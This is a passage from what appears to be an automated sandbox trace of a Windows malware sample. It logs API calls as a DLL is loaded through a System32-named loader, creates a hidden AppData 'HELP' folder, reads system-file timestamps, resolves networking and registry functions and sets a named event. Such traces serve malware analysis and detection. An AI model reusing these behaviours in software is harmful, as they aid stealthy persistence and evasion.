(dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.293] SetLastError (dwErrCode=0x0) [0030.293] GetLastError () returned 0x0 [0030.294] SetLastError (dwErrCode=0x0) [0030.294] GetLastError () returned 0x0 [0030.294] SetLastError (dwErrCode=0x0) [0030.294] GetLastError () returned 0x0 [0030.294] SetLastError (dwErrCode=0x0) [0030.294] GetLastError () returned 0x0 [0030.294] SetLastError (dwErrCode=0x0) [0030.294] GetLastError () returned 0x0 [0030.294] SetLastError (dwErrCode=0x0) [0030.294] GetLastError () returned 0x0 [0030.294] SetLastError (dwErrCode=0x0) [0030.294] GetLastError () returned 0x0 [0030.294] SetLastError (dwErrCode=0x0) [0030.294] GetLastError () returned 0x0 [0030.294] SetLastError (dwErrCode=0x0) [0030.294] GetLastError () returned 0x0 [0030.294] SetLastError (dwErrCode=0x0) [0030.294] GetLastError () returned 0x0 [0030.294] SetLastError (dwErrCode=0x0) [0030.294] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.295] SetLastError (dwErrCode=0x0) [0030.295] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.296] SetLastError (dwErrCode=0x0) [0030.296] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.297] SetLastError (dwErrCode=0x0) [0030.297] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.298] SetLastError (dwErrCode=0x0) [0030.298] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.299] GetLastError () returned 0x0 [0030.299] SetLastError (dwErrCode=0x0) [0030.300] GetLastError () returned 0x0 [0030.300] SetLastError (dwErrCode=0x0) [0030.300] GetLastError () returned 0x0 [0030.300] SetLastError (dwErrCode=0x0) [0030.300] GetLastError () returned 0x0 [0030.300] SetLastError (dwErrCode=0x0) [0030.300] GetLastError () returned 0x0 [0030.300] SetLastError (dwErrCode=0x0) [0030.300] GetLastError () returned 0x0 [0030.300] SetLastError (dwErrCode=0x0) [0030.300] GetLastError () returned 0x0 [0030.300] SetLastError (dwErrCode=0x0) [0030.300] GetLastError () returned 0x0 [0030.300] SetLastError (dwErrCode=0x0) [0030.300] GetLastError () returned 0x0 [0030.300] SetLastError (dwErrCode=0x0) [0030.300] GetLastError () returned 0x0 [0030.300] SetLastError (dwErrCode=0x0) [0030.302] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0030.302] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0030.302] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0030.303] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa60 | out: lpSystemTimeAsFileTime=0x26fa60*(dwLowDateTime=0xdffd1a70, dwHighDateTime=0x1d3dfba)) [0030.304] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f998, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.304] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f880, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.304] GetLastError () returned 0x0 [0030.305] GetLastError () returned 0x0 [0030.305] GetLastError () returned 0x0 [0030.305] GetLastError () returned 0x0 [0030.305] GetLastError () returned 0x0 [0030.305] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0030.305] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0030.305] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.305] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.305] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.306] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0030.306] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0030.306] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 1 [0030.306] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0030.306] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 1 [0030.307] GetLastError () returned 0x0 [0030.307] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0030.307] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0030.307] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0030.307] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0030.307] wsprintfA (in: param_1=0x26f700, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0030.307] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0030.307] wsprintfA (in: param_1=0x26f5fc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0030.307] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0030.318] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0030.318] CloseHandle (hObject=0x74) returned 1 [0030.318] GetLastError () returned 0x0 [0030.318] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0030.318] GetLastError () returned 0x0 [0030.318] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0030.319] GetSystemDirectoryA (in: lpBuffer=0x26f700, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0030.319] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0030.319] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0030.319] CloseHandle (hObject=0x74) returned 1 [0030.320] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0030.320] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0030.320] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0030.526] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0030.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0030.527] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0030.527] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0030.527] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0030.527] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0030.527] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0030.527] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0030.527] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0030.527] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0030.528] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0030.529] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0030.530] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0030.530] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0030.530] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0030.530] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0030.530] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0030.530] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0030.530] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0030.530] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0030.530] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0030.530] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0030.530] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0030.530] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0030.530] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0030.530] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0030.531] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0030.531] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0030.531] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0030.531] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0030.531] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0030.531] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0030.531] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0030.531] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0030.531] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0030.531] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0030.531] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0030.531] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.532] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.532] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.532] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x0 [0030.532] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName="97ryuhf023") returned 0x74 [0030.532] CreateFileMappingA (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x104, lpName="c745%") returned 0x78 [0030.532] MapViewOfFile (hFileMappingObject=0x78, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xd0000 [0030.532] GetLastError () returned 0x0 [0030.532] SetLastError (dwErrCode=0x0) [0030.532] CreateFileMappingA (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4, lpName="fjg48394") returned 0x7c [0030.532] MapViewOfFile (hFileMappingObject=0x7c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xe0000 [0030.532] GetLastError () returned 0x0 [0030.532] SetLastError (dwErrCode=0x0) [0030.533] GetLastError () returned 0x0 [0030.533] SetLastError (dwErrCode=0x0) [0030.533] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.533] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.533] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x72efff7e, lpParameter=0x8326d0, dwCreationFlags=0x4, lpThreadId=0x8326d0 | out: lpThreadId=0x8326d0*=0xa78) returned 0x80 [0030.533] ResumeThread (hThread=0x80) returned 0x1 [0030.557] AddAtomS () returned 0x0 [0030.559] HeapDestroy (hHeap=0x830000) returned 1 Thread: id = 12 os_tid = 0xa78 [0030.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.551] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.551] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.551] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.551] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.552] GetCurrentThreadId () returned 0xa78 [0030.552] GetLastError () returned 0x0 [0030.552] SetLastError (dwErrCode=0x0) [0030.552] Sleep (dwMilliseconds=0x2710) Process: id = "3" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f6e0" os_pid = "0xa60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 253 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 254 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 255 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 256 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 257 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 258 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 259 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 260 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 261 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 262 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 264 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 265 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 266 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 267 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 268 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 269 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 270 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 271 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 272 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 273 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 274 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = 